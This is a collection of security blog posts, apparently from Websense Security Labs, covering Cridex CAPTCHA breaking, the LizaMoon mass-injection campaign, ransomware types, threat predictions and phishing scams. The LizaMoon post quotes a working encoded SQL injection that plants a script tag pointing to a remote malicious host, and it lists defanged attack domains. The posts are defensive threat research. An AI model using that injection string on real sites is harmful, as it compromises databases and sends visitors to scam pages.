In a series of blogs a few years back, we covered how malware could abuse and circumvent online services that use CAPTCHA tests as part of their security (1 2). In this blog, we take a look at a recent malware variant from the wild caught on camera that shows CAPTCHA tests used by some online services are still weak and can be broken by malware.

The image below (Picture 1) shows this CAPTCHA breaking malware's ecosystem, which we'll describe step by step. Step 1: The starting point of an infection is a banking Trojan variant known as Cridex. This variant is propagated via malicious email messages that hold shortened links leading to exploit kits (see this example), in our case the Blackhole exploit kit. Step 2: If the exploit is successful, the Cridex variant is downloaded to the machine. Step 3: Cridex runs on the machine. Step 4: Cridex is a data-stealing Trojan that is similar to Zeus in the way it operates: It logs content from Web sessions and alters them to harvest information from the infected user. The Cridex configuration file downloaded by this variant (safe to view and download and shortened here) shows which websites the variant monitors and steals data from, along with Web form injection points (data alteration injected into Web forms to harvest additional data like ATM PIN numbers). We have observed that Facebook, Twitter, and many banking services are targets. A partial list of targeted websites can be found here. Step 5: Any stolen data from the system is uploaded to a command and control server.

Picture 1: The Cridex ecosystem:

Step 6: One of the components downloaded by Cridex with the configuration file is a propagation module or spamming module that allows the botmaster to send spam/malicious emails to infect other systems and increase the bot size. The spamming module holds backdoor components that allow browsing activities in the name of the user. The module opens Web sessions to online mail services and registers new email accounts that are later used by the bot to send spam/malicious emails. As we know, online mail services hold security checks like CAPTCHA challenges to verify that a human is indeed behind any account registration. Step 7: According to our findings, CAPTCHA challenges in some cases can be broken with the help of a CAPTCHA-breaking server, which allows the bot to register a mail account or address after only a few attempts. This video documents the registration of an online mail account by the bot on an infected machine:

Video:

Click here to watch the video on Youtube

The CAPTCHA-breaking process consists of posting CAPTCHA challenge images harvested from the online email registration form to a remote Web server (the CAPTCHA-breaking server). The request is an HTTP POST with an embedded CAPTCHA image posted to the CAPTCHA-breaking server. Once the server processes the image, it outputs a response in JSON format with the CAPTCHA text result that responds to the submitted image (see Picture 2). The backdoor component then tries to use that returned CAPTCHA text result in the online email account registration form. In case the CAPTCHA-breaking server output is wrong and does not correspond to the CAPTCHA image challenge, the process continues and the next CAPTCHA image challenge is submitted until the server manages to break the CAPTCHA. You can look at Picture 3 to see the images submitted to the CAPTCHA-breaking server and the corresponding results from the server. Not all the attempts succeed in breaking the CAPTCHA, but some do and in our example you see it took 6 attempts.

The malware reports to the CAPTCHA-breaking server whether the result it got actually broke the CAPTCHA. Picture 4 shows HTTP requests that report back to the CAPTCHA-breaking server whether the CAPTCHA result the server gave in previous sessions was indeed successful in breaking the CAPTCHA. A successful CAPTCHA break is signed with the r parameter: If the parameter is 0 (&r=0), the CAPTCHA break attempt was unsuccessful, whereas if the parameter is 1 (&r=1), the CAPTCHA break attempt was a success.

Picture 2: An HTTP POST request of an image to the CAPTCHA-breaking server and the response from the server

Picture 3: The images posted to the CAPTCHA-breaking server and their corresponding results

Picture 4: The malware reports to the CAPTCHA-breaking server if the CAPTCHA break attempt was successful

Websense® customers are protected from these threats by ACE™, our Advanced Classification Engine.

With all of the crazy 2011 security breaches, exploits and notorious hacks, what can we expect for 2012? Last year’s Websense Security Labs predictions were very accurate, so these predictions should provide very useful guidance for security professionals. Here are the highlights; the full report can be downloaded here.

1. Your social media identity may prove more valuable to cybercriminals than your credit cards. Bad guys will actively buy and sell social media credentials in online forums.

Trust is the basis of social networking, so if a bad guy compromises your social media log-ins, there is a good chance they can manipulate your friends. Which leads us to prediction #2.

2. The primary blended attack method used in the most advanced attacks will be to go through your social media “friends,” mobile devices and through the cloud.

We’ve already seen one APT attack that used the chat functionality of a compromised social network account to get to the right user. Expect this to be the primary vector, along with mobile and cloud exploits, in the most persistent and advanced attacks of 2012.

3. 1,000+ different mobile device attacks coming to a smartphone or tablet near you.

People have been predicting this for years, but in 2011 it actually started to happen. And watch out: the number of people who fall victim to believable social engineering scams will go through the roof if the bad guys find a way to use mobile location-based services to design hyperspecific geolocation social engineering attempts.

4. SSL/TLS will put net traffic into a corporate IT blind spot.

Two items are increasing traffic over SSL/TLS secure tunnels for privacy and protection. First is the disruptive growth of mobile and tablet devices. And second, many of the largest, most commonly used websites, like Google, Facebook, and Twitter are switching to https sessions by default, ostensibly a more secure transmission. But as more traffic moves through encrypted tunnels, many traditional enterprise security defenses are going to be left looking for a threat needle in a haystack, since they cannot inspect the encoded traffic.

5. Containment is the new prevention.

For years, security defenses have focused on keeping cybercrime and malware out. Organizations on the leading edge will implement outbound inspection and will focus on adapting prevention technologies to be more about containment, severing communications, and data loss mitigation after an initial infection.

6. The London Olympics, U.S. presidential elections, Mayan calendar, and apocalyptic predictions will lead to broad attacks by criminals.

Cybercriminals will continue to take advantage of today’s 24-hour, up-to-the minute news cycle, only now they will infect users where they are less suspicious: sites designed to look like legitimate news services, Twitter feeds, Facebook posts/emails, LinkedIn updates, YouTube video comments, and forum conversations.

7. Social engineering and rogue anti-virus will continue to reign.

Scareware tactics and the use of rogue anti-virus, which decreased a bit in 2011, will stage a comeback. Except, instead of seeing “You have been infected” pages, we anticipate three areas will emerge as growing scareware subcategories in 2012: a growth in fake registry clean-up, fake speed improvement software, and fake back-up software mimicking popular personal cloud backup systems.

You can also watch a video of the Websense Security Labs discussing the predictions here:

Historically, malware uses IRC to communicate outbound once it has infected a host. But what exactly is malware doing now? In this week’s Websense Security Labs video, researchers Ali Mesdaq and Stephan Chenette guide us through an explanation of malware that communicates using custom encryption. They explain what ports this malware is using, how it is communicating and how Websense does to stop it from infecting corporate networks and stealing valuable data.
 
Follow the latest breaking news on cyber security with the weekly Websense Security Labs Video diaries here.
 
Read more about how to protect your organization from malware that communicates using custom encryption here.

In this week’s Websense Security Labs video, researchers Armin Buescher, Stephan Chenette and Gregory Newman introduce us to “Morto,” a very unusual worm spreading across networks. Unlike your typical PC malware, Trojan or Rogue AV, Morto is unique because of the curious and unusual ways in which it propagates. In this video, find out how Morto takes advantage of weak passwords to infiltrate and the atypical approach it takes to compromise additional hosts.

In this week’s Websense Security Labs Video, Chris Astacio discusses a mass injection attack that is compromising a wide swath of WordPress sites through a vulnerability in TimThumb.php, a common module used in many WordPress themes.
 
This widespread attack compromised tens of thousands of domains which led to a site hosting injected malicious code. After the video, you can read an analysis of the exploit in our blog post here. That post features a link to the patched version of TimThumb that users can download to remove this vulnerability.

Cybercriminals are on the move again. And, this time, Canada is the prime target. IP addresses in China and Eastern Europe are highly scrutinized and undergoing intense evaluation. So hackers are on a quest to move their networks to countries, like Canada, that have better cyber reputations.

It's a little surprising to me as well. Previously, Canada was a place of great beer and hockey (next year, Habs!). But Websense recently conducted an analysis of Canada’s cyber security risk profile, and all trends pointed to Canada as the new launchpad for cybercriminals. For example:

• Jump in Hosted Phishing Sites - Canada saw a huge increase in the number of servers hosting phishing sites, jumping 319 percent in the last year. This tremendous increase over the last 12 months is second only to Egypt in terms of the growth of sites hosting crimeware.                           
• Increase in Bot Networks – Cybercriminals are moving their command and control centers to safer grounds. In the past eight months, Canada saw a 53 percent increase in bot networks. In fact, Canada scored the second highest for hosting bot networks, when compared to the U.S., France, Germany and China.  
• Malicious Websites – We’re seeing a trend of malicious websites decline across the board. However, Canada’s decline is tremendously slower, when compared to the countries listed above.
• Overall Increase in Cybercrime – In Websense’s most recent Threat Report, Canada was #13 in the world for hosting cybercrime. Now they have jumped to #6 in the world in 2011. And, this number continues to rise.

More malicious content is being hosted in Canada than ever before. How will the public and private sector protect Canada? And, will the Canadian government be able to take down major Internet crime networks - similar to when the US brought down Rustock and Coreflood?

Here's a quick peek at the top countries hosting phishing sites for the first part of this year. You can clearly see that Canada now holds the number two position for hosting this type of crimeware.

So, the question I have for you folks - is this surprising to you? Why or why not? We'd love to hear from you in the comments below.

>>>>>>>>>>>>>>>>>>>>>>>>>

Download video file:

Windows  |   Mac

>>>>>>>>>>>>>>>>>>>>>>>>>

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL or page, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down over time.

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php
hxxp://pop-stats.info/ur.php
hxxp://star-stats.info/ur.php
hxxp://multi-stats.info/ur.php
hxxp://google-stats44.info/ur.php
hxxp://books-loader.info/ur.php
hxxp://google-stats73.info/ur.php
hxxp://google-stats47.info/ur.php
hxxp://google-stats50.info/ur.php

List updated: 4/1/2011 12:16pm PT

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

More information is available over on Stackoverflow.com.

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.

So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

Questions & Answers about the LizaMoon mass-injection

Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign was created on March 25, 2011 was called lizamoon.com.

Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected are significantly smaller.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the web application isn't filtering input from the user correctly.

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

There are always different ways to make money. Cybercriminals know it, and their imagination is unlimited as far as we can tell. Sometimes they lure users into downloading a rogue AV as a treatment for an “infected computer”, other times they literally extort users to pay to get their own data or computer access back. Let's have a look into the infamous malware called ransomware.

In general we can divide this sort of malware into three separate categories:

1. file encrypters

2. system lockers

3. application lockers

    

Even though their application varies, the aim is always the same. The victim has to pay, otherwise the data/access will be lost for ever.

File encrypters

The first group represents the most notorious extortion tactic from the real world – “pay now otherwise you will not see it again”. It all started around 1989, when the first ransomware was introduced – PC Cyberg Trojan alias AIDS trojan horse. The basics have remained unchanged since. Once the trojan launches on a victim's computer, all custom data (files that are important from the user perspective) is encrypted and is therefore inaccessible to the user. With PC Cyberg the victim was asked to post the ransom to a PO Box in Panama; nowadays the criminals ask users to send either an SMS to a premium mobile number, or transfer money to online payment services such as Egold, Liberty Services or others. The payment varies from $20 up to $200 depending on the sophistication of the malware and greediness of the authors.

In 2004 Gpcode (known also as PGPCoder - Trojan-Ransom.Win32.GpCode) emerged into the world. Unlike PC Cyberg, which used a weak symmetric key for the whole encryption, Gpcode starts with RC4 and carries on up to AES-256 concealed into RSA-1024 public encryption - the symmetric encryption key is in the body of the virus encrypted by the RSA public key. This sophisticated method makes the cipher unbreakable and the victim has to either pay the ransom and hope for “honesty” from the attacker, or restore all data from the backup – if it exists. Once Gpcode finishes the encryption, the desktop changes and shows a notification of what has just happened with a message window explaining the same (Picture 1).

Picture 1 : Gpcode notification about encrypted files and the ransom request

Every folder with encrypted data contains a new file explaining the situation – either !_READ_ME_!.txt or HOW TO DECRYPT FILES.txt, and every encrypted file has a new extension added – either ._CRYPT or .ENCODED (Picture 2).

Picture 2 : Every folder contains the extortion text explanation

Files are not deleted so the recovery is theoretically possible unless the criminals are completely unscrupulous. You want to believe so, don't you?

The virus uses Microsoft Enhanced Cryptographic Provider to encrypt files built by default in Windows, which makes the whole operation extremely fast.

Since the first version of Gpcode has been discovered we have seen many different versions and also copycatting with weak or embedded keys. Nevertheless, this kind of malware can cause real harm to the victims unless all data has been freshly backed up.

System lockers

The second category contains malware that blocks access to the vital or essential parts of the system. From samples we have seen we could divide them into two types:

1. screen lockers

2. boot lockers

The former is performed by either blocking the access to the system interaction completely and showing an extortion message (Picture 3), or just partially covering the screen with an embarrassing image and message (Picture 4) – e.g. Trojan.Ransomlock or Trojan.SMSlock. As the message can “reveal” unwanted details about the victim (“you surfed porn sites for free now you have to pay”) the victims often pay without contacting any professionals to help them out.

Picture 3 : The access to the machine is blocked by the malware's notification screen

Picture 4 :  Embarrassing ad ransomware tactic.

Both of these were first seen around April 2009, and mostly in Russia where there is no problem getting hold of anonymous premium numbers - as opposed to other Western countries who ask for strong proof of identity. As with the previous category there is no assurance that the victim will receive the unlocking key once the text is sent. As happens with ransoms in general, the criminals can ask for more once they see the victim is willing to pay. Fortunately, this malware is not as sophisticated as the previously-mentioned one, so there is a chance to get hold of an unlocking utility or a code generator from the Internet.

The second type, boot lockers, replaces the MBR on the disk with an infected one blocking the booting sequence of the computer completely – e.g. Trojan.Bootlock. The message informs the victim about a way how to decrypt the disk by sending a text to a premium number (Picture 5). The criminals claim the whole disk has been encrypted and the only way to get the data back is to pay via uKash or paysafecard on www.safe-data.ru (Picture 6). Again, fortunately for the victims, there is no encryption on the hard drives, only a simple MBR replacement. Also, this particular malware has been using the same passwords continuously - aaaaaaciip and aaaaadabia.

Picture 5 : Ransomware replaces the MBR with an infected one blocking the PC boot sequence completely

Picture 6 : The criminals ask for a payment via online payment services

Application lockers

The last category is probably the least widespread and least dangerous one. The malware blocks access to specific applications or Web sites asking either for ransom, or more often for the victim to fill out a survey subscribing them to the premium rate mobile services – e.g. Yimfoca IM worm. If the victim declines to fill in the survey, access to the page remains blocked. Even restarting the machine does not help. However, other browsers can access the site with no problems.

Malware delivery

The delivery of malicious files is done via the usual malware channels – fake codecs or video players, embedded in illegal copies of programs, via spam, IM chats, comments on personal pages, or USB drives containing "special bonuses”. There is nothing new about the ways in which criminals try to compromise victims. Having said this, protection against such attacks is possible and Websense customers are protected with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

Is ransomware a successor of scareware?

We dare to say it is not. Both malware groups try to convince the victim that there is no way to avoid paying money, although the approach is very different. With scareware the victims at least have a chance to resist the social engineering offering the only solution and work on the cleaning process on their own. With ransomware this chance hardly exists at all. Yes, there are many similarities and it is likely the same people stand behind both types of malware groups. However, in one case there is a "seller" offering the "products and services"; in the other one an extorter asking for ransom. Even though both are illegal and dishonest, the approach is different.

Restoration and Protection

Restoration of data or access depend on the kind of malware. In some cases it is possible to download a utility and clean the infected system, in other cases to replace malicious parts with clean ones. Unfortunately, there is no means to bypass malware such as Gpcode. Therefore the only protection is to keep up-to-date backups stored off the machine all the time. With cheap memory accessibility this should not be an issue at all. And, of course, services from Websense protect potential victims even against such obstacles as restoring data from backups.

To see how Websense protects our customers from Ransomware you can watch the following YouTube video:

As the UK self assessment tax return deadline for online completion draws near, and the US tax season begins, we at Websense Security Labs again see an increase in related spam.

The most recent attacks are mainly "form-based."  Our Threatseeker network finds these coming in several varieties, but the main one is a request for the recipient to complete an attached HTML form or zipped file containing an HTML form. Given that it is tax season, this phishing attack often takes the form of welcome news: it purports to be an email notification from the tax office indicating a refund. As usual, spammers are keeping abreast with the important events of the season, and know that January is when the public usually submits returns and starts getting refunds. The form-based approach is a slight variation--the spammers don’t seem to be restricting themselves to the usual direct links to phishing sites to lure unsuspecting recipients to divulge personal details.

Websense customers are proactively protected against this attack via both email and Web channels by our Advanced Classification Engine - ACE. 

What are form-based email attacks?

Form-based attacks are a type of phishing.  Instead of using a link to take the recipient to a phishing site, they include a form that the user is asked to complete.  When the user completes and submits the form, the details are sent to the attacker.  The short video below shows an example of a form-based attack.

As shown below, several of the attacks are very convincing. We can see how a user might fall prey to such a scam.  The first of the samples is aimed at users in the United Kingdom, and includes a picture of Moira Stuart, who plays the narrator in the HMRC television advert.  The second sample is aimed at users in the United States users, as the content suggests (IRS). 

Other form-based samples that we see in the wild include campaigns that target:

- LlloydsTSB Bank

- HSBC Bank

- Santander Bank

- Alliance & Leicester Bank

- Paypal

Recently, at Websense Security Labs, we have seen Facebook being used to display phishing pages for different services, as well as to redirect to phishing pages hosted elsewhere. Below are two examples of what the phishing attempts look like:

The first email message appears to come from Facebook Security, and requests that users confirm their account. This is just like other phishing attacks we see every day. The twist here is that the phishing page itself gets loaded from within the Facebook site using an iframe. This makes it look much more legitimate than a site hosted on another domain.

The second message is similar, but there's another URL towards the end. Clicking the link sends the user to www.facebook.com, where a script redirects the user to another Web site that contains the phishing page.

Both of these attacks make it harder for the user to spot the malicious content directly from the email. Both messages do point to a valid Facebook URL. In addition, the inclusion of valid Facebook URLs makes protecting users somewhat harder for anti-spam solutions and Web filtering products that rely on heavily URL filtering to classify content.

Below is a video of both attacks in action. The video also shows a variant that looks like a Zynga account notification, also hosted in part by Facebook. Our customers have been protected against this threat by ACE, our Advanced Classification Engine.